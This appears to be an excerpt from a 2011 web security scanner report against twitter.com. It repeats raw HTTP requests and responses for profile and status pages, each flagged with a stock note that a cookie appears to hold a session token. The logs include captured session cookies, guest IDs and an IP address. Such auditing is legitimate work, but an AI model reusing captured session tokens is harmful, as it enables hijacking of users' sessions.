HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:13 GMT Server: hi Status: 200 OK X-Transaction: 1296225073-41249-57241 ETag: "a0613392b43e537b2e040e0724b95bf7" Last-Modified: Fri, 28 Jan 2011 14:31:13 GMT X-Runtime: 0.01266 Content-Type: text/html; charset=utf-8 Content-Length: 53641 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ebello HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:40 GMT Server: hi Status: 200 OK X-Transaction: 1296225040-69634-53816 ETag: "ec4d064b3111971c1cbbd076806b6c98" Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT X-Runtime: 0.01003 Content-Type: text/html; charset=utf-8 Content-Length: 54961 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ericmmartin HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:43 GMT Server: hi Status: 200 OK X-Transaction: 1296224922-26410-25724 ETag: "b52f4470d0eb7102204e56e131ce2f8f" Last-Modified: Fri, 28 Jan 2011 14:28:42 GMT X-Runtime: 0.50069 Content-Type: text/html; charset=utf-8 Content-Length: 58034 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiNodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW46DGNzcmZfaWQiJTgyOTI5MWZkOGU2YmQxN2QxYTRkYzlmMDFlZjViZDVk%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE%253D--aec68d2fd0935035e3877d8879d09c5b64c00398; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ericmmartin/status/30128016856195073 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:46 GMT Server: hi Status: 200 OK X-Transaction: 1296224926-9669-3756 ETag: "8a207398e91696a15179ff55977c38f1" Last-Modified: Fri, 28 Jan 2011 14:28:46 GMT X-Runtime: 0.04848 Content-Type: text/html; charset=utf-8 Content-Length: 13726 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW4vc3RhdHVzLzMwMTI4MDE2ODU2MTk1MDczOgxjc3JmX2lkIiVmMzE1MDNl%250AMzcxMDU0OWE3YjU2YTE5Zjk1OGRkMDBmMToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--f20b609817e7de3826da0bcc06ca803fab8dec0f; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favorites/14594657.rss HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:37 GMT Server: hi Status: 200 OK X-Transaction: 1296224737-3926-21803 X-RateLimit-Limit: 150 ETag: "708dea7c27c89c56a852101cec365315" Last-Modified: Fri, 28 Jan 2011 14:25:37 GMT X-RateLimit-Remaining: 144 X-Runtime: 0.06567 X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018 Content-Type: application/rss+xml; charset=utf-8 Content-Length: 13545 Pragma: no-cache X-RateLimit-Class: api X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 X-RateLimit-Reset: 1296227305 Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:35:18 GMT Server: hi Status: 200 OK X-Transaction: 1296232518-14489-49043 X-RateLimit-Limit: 150 ETag: "a73f7cf89a5f9d35a2a745da5eeb4d24"-gzip Last-Modified: Fri, 28 Jan 2011 16:35:18 GMT X-RateLimit-Remaining: 150 X-Runtime: 0.07886 X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018 Content-Type: application/json; charset=utf-8 Pragma: no-cache X-RateLimit-Class: api X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 X-RateLimit-Reset: 1296236118 Set-Cookie: _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; domain=.twitter.com; path=/ Vary: Accept-Encoding X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close Content-Length: 33965
TWTR.Widget.receiveCallback_1([{"favorited":false,"text":"Check out Smackdown tonight. Edge and I team up for the first time in 4 yrs to give a much deserved beating to Miz and Ziggler","place":null," ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gercheq HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:17 GMT Server: hi Status: 200 OK X-Transaction: 1296225077-54075-30524 ETag: "4793986d74da0ff9abc545ba99de39af" Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT X-Runtime: 0.27545 Content-Type: text/html; charset=utf-8 Content-Length: 51283 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /greenRAYn20 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:56 GMT Server: hi Status: 200 OK X-Transaction: 1296266036-99102-50087 ETag: "633d1248acbb92f412629e8aa3e8a93b" Last-Modified: Sat, 29 Jan 2011 01:53:56 GMT X-Runtime: 0.01198 Content-Type: text/html; charset=utf-8 Content-Length: 9230 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /harvardlampoon HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:17 GMT Server: hi Status: 200 OK X-Transaction: 1296265997-31045-3388 ETag: "dd05aa33a38e41399f97d64b699efc32" Last-Modified: Sat, 29 Jan 2011 01:53:17 GMT X-Runtime: 0.01350 Content-Type: text/html; charset=utf-8 Content-Length: 19877 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j_hollender HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:16 GMT Server: hi Status: 200 OK X-Transaction: 1296225016-34363-18254 ETag: "ff41031bc88714d0c96acba56a4b58e3" Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT X-Runtime: 0.01703 Content-Type: text/html; charset=utf-8 Content-Length: 50673 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j_hollender/status/28168027493105664 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:19 GMT Server: hi Status: 200 OK X-Transaction: 1296225019-47017-40660 ETag: "f40d96b3c19b236169916ec226be14ef" Last-Modified: Fri, 28 Jan 2011 14:30:19 GMT X-Runtime: 0.05160 Content-Type: text/html; charset=utf-8 Content-Length: 13838 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTY4MDI3NDkzMTA1NjY0Ogxjc3JmX2lkIiU5OTJjOGJk%250AOGYzZTA0NDA4Y2Q1Y2MwMTkzZTZhMTliZjoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--3734fcc51205696679bb42e413a9322e748617b9; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j_hollender/status/28175738595180544 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:18 GMT Server: hi Status: 200 OK X-Transaction: 1296225018-12254-34367 ETag: "61544e0c3acbf3bd257ae209a889c048" Last-Modified: Fri, 28 Jan 2011 14:30:18 GMT X-Runtime: 0.04377 Content-Type: text/html; charset=utf-8 Content-Length: 13823 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTc1NzM4NTk1MTgwNTQ0Ogxjc3JmX2lkIiU2ZGExNWUw%250AMGMyZWNjNjJjMzIzODFhMjU5NmZkNTkzZjoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--49158f0023a784432eb325042f2a8c5b699ba833; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j_hollender/status/28205461161377793 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:18 GMT Server: hi Status: 200 OK X-Transaction: 1296225018-25935-2577 ETag: "005ad16ba87e94e3722ccf310c3a3b93" Last-Modified: Fri, 28 Jan 2011 14:30:18 GMT X-Runtime: 0.04800 Content-Type: text/html; charset=utf-8 Content-Length: 13823 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: 